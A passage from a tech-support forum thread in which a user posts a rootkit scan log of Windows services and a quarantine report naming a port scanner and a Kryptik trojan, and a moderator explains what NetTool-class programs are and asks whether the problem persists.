09:28:26.0624 0x0a3c  [ 9614B5D29DC76AC3C29F6D2D3AA70E67, A2FFB92F0030B4CD771E862DA575ECCF2F3A5B4B85858C1241A0C59262C0EC88 ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
09:28:26.0646 0x0a3c  WbioSrvc - ok
09:28:26.0676 0x0a3c  [ 34EEE0DFAADB4F691D6D5308A51315DC, A040A03E25A0C78B9E26F86C2DF95BCAF8E7EC90183CEB295615D3265350EBEE ] wcncsvc         C:\Windows\System32\wcncsvc.dll
09:28:26.0721 0x0a3c  wcncsvc - ok
09:28:26.0744 0x0a3c  [ 5D930B6357A6D2AF4D7653BDABBF352F, 677FF2ED14EE0B0CAA710DA81556CC16D5971DAB10E7C7432D167A87CA6F0EAA ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
09:28:26.0757 0x0a3c  WcsPlugInService - ok
09:28:26.0777 0x0a3c  [ 1112A9BADACB47B7C0BB0392E3158DFF, 1AE2AFA125973571F91E6945FE8A735F63D76EBB250A0075D98C580167FD9ED4 ] Wd              C:\Windows\system32\drivers\wd.sys
09:28:26.0781 0x0a3c  Wd - ok
09:28:26.0846 0x0a3c  [ 25944D2CC49E0A6C581D02A74B7D6645, AF8FFAFEC07F1A6A3D4008E609E8E1D705A8DFCC7995C766E3946887203F7BEE ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
09:28:26.0881 0x0a3c  Wdf01000 - ok
09:28:26.0912 0x0a3c  [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiServiceHost  C:\Windows\system32\wdi.dll
09:28:26.0924 0x0a3c  WdiServiceHost - ok
09:28:26.0936 0x0a3c  [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiSystemHost   C:\Windows\system32\wdi.dll
09:28:26.0948 0x0a3c  WdiSystemHost - ok
09:28:26.0984 0x0a3c  [ 75E8EBD7040CE238684333F97014762A, 2CA0B267FBAEB303D1F8B639D733DC0DE17BA1276CC9096035B4F2BBBED3EF7F ] WebClient       C:\Windows\System32\webclnt.dll
09:28:27.0018 0x0a3c  WebClient - ok
09:28:27.0050 0x0a3c  [ 760F0AFE937A77CFF27153206534F275, A53940BA28854486FF18F16B98A3314B36322B0B6EFB54D08B921315BEB0ADD5 ] Wecsvc          C:\Windows\system32\wecsvc.dll
09:28:27.0084 0x0a3c  Wecsvc - ok
09:28:27.0109 0x0a3c  [ AC804569BB2364FB6017370258A4091B, 1856F354146A5946F3E7D0DD09726FC8A3502B0F0776FEADDF10669C81CC28E2 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
09:28:27.0120 0x0a3c  wercplsupport - ok
09:28:27.0141 0x0a3c  [ 08E420D873E4FD85241EE2421B02C4A4, E1E9436EB096FF7DE9A76DA6217035257EF9FC7565DDB9016DCA3859E7F1EF0F ] WerSvc          C:\Windows\System32\WerSvc.dll
09:28:27.0153 0x0a3c  WerSvc - ok
09:28:27.0191 0x0a3c  [ 8B9A943F3B53861F2BFAF6C186168F79, 88E2F79F32AFBA17CB8377A508B83A1EC2315E9F3A365F591C87FE4525AA6713 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
09:28:27.0193 0x0a3c  WfpLwf - ok
09:28:27.0219 0x0a3c  [ 5CF95B35E59E2A38023836FFF31BE64C, CEA21302B3E855EE592810D4E0DE10E47A47A393064C435463CD54598735CD8D ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
09:28:27.0222 0x0a3c  WIMMount - ok
09:28:27.0312 0x0a3c  [ 082CF481F659FAE0DE51AD060881EB47, BB67D2AF0BB9192D4CCF66C23D80CE5A1B38715556D94E2561DBF8F805FA30A5 ] WinDefend       C:\Program Files\Windows Defender\mpsvc.dll
09:28:27.0358 0x0a3c  WinDefend - ok
09:28:27.0404 0x0a3c  WinHttpAutoProxySvc - ok
09:28:27.0487 0x0a3c  [ F62E510B6AD4C21EB9FE8668ED251826, FA3E5CAC3E67E49377320CFBE4646585E6B62168292768FEA81E4623F9166890 ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
09:28:27.0500 0x0a3c  Winmgmt - ok
09:28:27.0605 0x0a3c  [ 1B91CD34EA3A90AB6A4EF0550174F4CC, 5B6618615EBFBA594C945AD35F5C68DA8C6053892B6D12D626BB6120910D80DC ] WinRM           C:\Windows\system32\WsmSvc.dll
09:28:27.0685 0x0a3c  WinRM - ok
09:28:27.0802 0x0a3c  [ 16935C98FF639D185086A3529B1F2067, E9C6B73A572A04FCE9B1B0E6815F941B10332D9A6D55B92927C2B1275F119091 ] Wlansvc         C:\Windows\System32\wlansvc.dll
09:28:27.0858 0x0a3c  Wlansvc - ok
09:28:27.0899 0x0a3c  [ 0217679B8FCA58714C3BF2726D2CA84E, 4494984B922DCF24D37BCD0E6831CEBD07D1CA49235D04E821D17ED3DF84ED2A ] WmiAcpi         C:\Windows\system32\drivers\wmiacpi.sys
09:28:27.0902 0x0a3c  WmiAcpi - ok
09:28:27.0950 0x0a3c  [ 6EB6B66517B048D87DC1856DDF1F4C3F, EBB534C4829477C70062ADBB5626236B02FE563A544C53FA255E79F3CA170FE8 ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
09:28:27.0959 0x0a3c  wmiApSrv - ok
09:28:28.0088 0x0a3c  [ 3B40D3A61AA8C21B88AE57C58AB3122E, 6C67DCB007C3CDF2EB0BBF5FD89C32CD7800C20F7166872F8C387BE262C5CD21 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\wmpnetwk.exe
09:28:28.0157 0x0a3c  WMPNetworkSvc - ok
09:28:28.0194 0x0a3c  [ A2F0EC770A92F2B3F9DE6D518E11409C, 6838F2148B11285E00DC449D51F8AD85AAE57694E89BA2C607B87AC1C650D845 ] WPCSvc          C:\Windows\System32\wpcsvc.dll
09:28:28.0203 0x0a3c  WPCSvc - ok
09:28:28.0223 0x0a3c  [ AA53356D60AF47EACC85BC617A4F3F66, 155CB8112AA382D841C1891750FF29EF4F1BF716CD9CDF0F2243209E2CCCAC98 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
09:28:28.0236 0x0a3c  WPDBusEnum - ok
09:28:28.0262 0x0a3c  [ 6DB3276587B853BF886B69528FDB048C, 9972FF6DF0DF6F86D1E9BCEF4C29064748B217DA196B0633C30D3D580144951C ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
09:28:28.0265 0x0a3c  ws2ifsl - ok
09:28:28.0288 0x0a3c  [ 6F5D49EFE0E7164E03AE773A3FE25340, 15B6AFF7455538189A96F8863CC995A271E02C6FBDAC15B037D44DDA65E61339 ] wscsvc          C:\Windows\System32\wscsvc.dll
09:28:28.0300 0x0a3c  wscsvc - ok
09:28:28.0313 0x0a3c  WSearch - ok
09:28:28.0484 0x0a3c  [ FC3EC24FCE372C89423E015A2AC1A31E, 8D028182CF83667D3E4D148979972D208FA6D9B8540EE47A0A7831B770ECD257 ] wuauserv        C:\Windows\system32\wuaueng.dll
09:28:28.0615 0x0a3c  wuauserv - ok
09:28:28.0648 0x0a3c  [ 06E6F32C8D0A3F66D956F57B43A2E070, 9A6BD96A28294B0372F16E13D652FD603308F64B74A56E41E0C68C5E8011F943 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
09:28:28.0654 0x0a3c  WudfPf - ok
09:28:28.0690 0x0a3c  [ 867C301E8B790040AE9CF6486E8041DF, D867D6498C987944D99508B2FAD6D6B749FA1EDFE8124B0863D4A642352F0855 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
09:28:28.0700 0x0a3c  WUDFRd - ok
09:28:28.0735 0x0a3c  [ FE47B7BC8EA320C2D9B5E5BF6E303765, 34518DBD1E9EA6E5DA62273B18613761E1D9C6B4E074A93C6D639FBAF02222EA ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
09:28:28.0748 0x0a3c  wudfsvc - ok
09:28:28.0804 0x0a3c  [ 7CC38741B8F68F1E0D5D79DA6123666A, F90D2DA1C9AFB506C381CD386E1430931B5F81813FEDFD720F87FBC54E7A00DA ] WwanSvc         C:\Windows\System32\wwansvc.dll
09:28:28.0849 0x0a3c  WwanSvc - ok
09:28:28.0872 0x0a3c  ================ Scan global ===============================
09:28:28.0918 0x0a3c  [ DAB748AE0439955ED2FA22357533DDDB, 73EDD402C7479DDCE1998D0C7E99E1EC2974F64EFC33A851439CC85D09EDCDF9 ] C:\Windows\system32\basesrv.dll
09:28:28.0950 0x0a3c  [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
09:28:28.0999 0x0a3c  [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
09:28:29.0052 0x0a3c  [ 364455805E64882844EE9ACB72522830, 906561DBBB33F744844CF27E456226044C85DF0FCFD26DE1FD11E09E2CFA6F8F ] C:\Windows\system32\sxssrv.dll
09:28:29.0096 0x0a3c  [ 5F1B6A9C35D3D5CA72D6D6FDEF9747D6, D7BC4ED605B32274B45328FD9914FB0E7B90D869A38F0E6F94FB1BF4E9E2B407 ] C:\Windows\system32\services.exe
09:28:29.0129 0x0a3c  [ Global ] - ok
09:28:29.0130 0x0a3c  ================ Scan MBR ==================================
09:28:29.0143 0x0a3c  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
09:28:29.0340 0x0a3c  \Device\Harddisk0\DR0 - ok
09:28:29.0341 0x0a3c  ================ Scan VBR ==================================
09:28:29.0355 0x0a3c  [ C34E5BC4B9DFA9C73493621F56412020 ] \Device\Harddisk0\DR0\Partition1
09:28:29.0359 0x0a3c  \Device\Harddisk0\DR0\Partition1 - ok
09:28:29.0369 0x0a3c  [ 30C7AD82979D6F671E2BE6B5A532E3E5 ] \Device\Harddisk0\DR0\Partition2
09:28:29.0372 0x0a3c  \Device\Harddisk0\DR0\Partition2 - ok
09:28:29.0375 0x0a3c  Waiting for KSN requests completion. In queue: 48
09:28:30.0375 0x0a3c  Waiting for KSN requests completion. In queue: 48
09:28:31.0375 0x0a3c  Waiting for KSN requests completion. In queue: 48
09:28:32.0409 0x0a3c  AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.5.216.0 ), 0x61000 ( enabled : updated )
09:28:32.0564 0x0a3c  Win FW state via NFP2: enabled
09:28:35.0457 0x0a3c  ============================================================
09:28:35.0457 0x0a3c  Scan finished
09:28:35.0457 0x0a3c  ============================================================
09:28:35.0484 0x04b0  Detected object count: 0
09:28:35.0484 0x04b0  Actual detected object count: 0
09:29:03.0317 0x17c0  Deinitialize success

--------------------------------------------------------------------------------------------------------------------------------------------------------

 

C:\MasterCD\SiteTools\ipscan.exe Win32/NetTool.Portscan.C potentially unsafe application deleted - quarantined
C:\Users\POS\AppData\Roaming\OracleJava\javaw.exe a variant of Win32/Kryptik.BZZR trojan cleaned by deleting - quarantined
 

 



#5 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,082 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:02:31 AM

Posted 16 April 2014 - 03:07 PM

The infection Net Tool port scan could produce the behavior you described.

 

Programs classified as NetTool are designed to work with a network (for example, remotely rebooting a computer, scanning open network ports, remotely launching random applications, etc.). These features allow cyber criminals use them for malicious purposes, although the programs themselves are not malicious

Do you still see that behavior?


How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users